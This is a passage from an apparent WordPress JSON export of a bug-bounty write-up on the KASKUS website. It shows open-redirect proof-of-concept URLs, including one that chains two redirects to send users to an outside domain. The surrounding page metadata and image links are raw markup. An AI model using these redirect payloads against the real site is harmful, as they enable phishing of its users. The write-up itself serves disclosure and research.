https:\/\/fjb.kaskus.co.id\/user\/switchtomobile\/?url=\/hello<\/code><\/pre>\n\n\n\nIt redirects to:<\/p>\n\n\n\n
https:\/\/fjb.m.kaskus.co.id\/hello<\/code><\/pre>\n\n\n\nHowever, when I removed the slash character from the url<\/strong> parameter:<\/p>\n\n\n\nhttps:\/\/fjb.kaskus.co.id\/user\/switchtomobile\/?url=hello<\/code><\/pre>\n\n\n\nThe page redirected to:<\/p>\n\n\n\n
https:\/\/fjb.m.kaskus.co.idhello<\/code><\/pre>\n\n\n\nThis behavior is unusual because the URL should have been:<\/p>\n\n\n\n
https:\/\/fjb.m.kaskus.co.id\/hello<\/code><\/pre>\n\n\n\nIn such cases, we can insert any domain into the url<\/strong> parameter, and the fjb.m.kaskus.co.id<\/strong> subdomain will become part of the domain we inserted into the parameter. Here\u2019s an example:<\/p>\n\n\n\nhttps:\/\/fjb.kaskus.co.id\/user\/switchtomobile\/?url=.rizal.ninja ==> https:\/\/fjb.m.kaskus.co.id.rizal.ninja<\/code><\/pre>\n\n\n\nAfter re-checking with Links-Crawler<\/strong>, I discovered two URLs with the same Open Redirect<\/strong> vulnerability:<\/p>\n\n\n\nhttps:\/\/fjb.kaskus.co.id\/user\/switchtomobile\/?url=.rizal.ninja ==> https:\/\/fjb.m.kaskus.co.id.rizal.ninja\n\nhttps:\/\/www.kaskus.co.id\/user\/switchtomobile\/?url=.rizal.ninja ==> https:\/\/m.kaskus.co.id.rizal.ninja<\/code><\/pre>\n\n\n\nAnother Open Redirect bug I found was on the URL:<\/p>\n\n\n\n
https:\/\/www.kaskus.co.id\/redirect?url=<\/code><\/pre>\n\n\n\nIf you insert a domain like *.kaskus.co.id<\/strong> into the url<\/strong> parameter, the page will immediately redirect to that domain. However, if the domain is not kaskus.co.id<\/strong>, it won’t redirect and will show a page like this:<\/p>\n\n\n\nIn this case, we can use the PoC<\/strong> (Proof of Concept) from the first Open Redirect<\/strong> vulnerability as a payload in the second one:<\/p>\n\n\n\nhttps:\/\/www.kaskus.co.id\/redirect?url=https:\/\/fjb.kaskus.co.id\/user\/switchtomobile\/?url=.rizal.ninja ==> https:\/\/fjb.kaskus.co.id\/user\/switchtomobile\/?url=.rizal.ninja ==> https:\/\/fjb.m.kaskus.co.id.rizal.ninja\n<\/code><\/pre>\n\n\n\nThat\u2019s all for now. I hope this report helps highlight some vulnerabilities I found on KASKUS. While these issues may seem minor, they pose potential risks for users and should be addressed for a safer browsing experience.<\/p>\n\n\n\n
#HappyHacking<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"This time, I\u2019d like to share my bug-hunting experience on the KASKUS website. I\u2019ve discovered several bugs, including POST-based XSS, Reflected XSS, Stored XSS, and Open Redirect Vulnerabilities. Recon The first step I took was reconnaissance, starting with gathering subdomains for the KASKUS site. I used sublist3r to collect these subdomains. Once I had collected […]<\/p>\n","protected":false},"author":3,"featured_media":148,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[23,9,26,8],"class_list":["post-127","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-research","tag-bug-bounty","tag-cross-site-scripting","tag-open-redirection","tag-xss"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/127","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=127"}],"version-history":[{"count":1,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/127\/revisions"}],"predecessor-version":[{"id":149,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/127\/revisions\/149"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/148"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=127"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=127"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=127"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\"](\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/kaskus1-1024x576.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/kaskus2-1024x573.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/kaskus3-1024x573.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/kaskus4.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/kaskus5.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/kaskus6.png\")
<\/figure>\n\n\n\n![\"\"](\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2024\/12\/kaskus7-1024x474.png\")
<\/figure>\n\n\n\n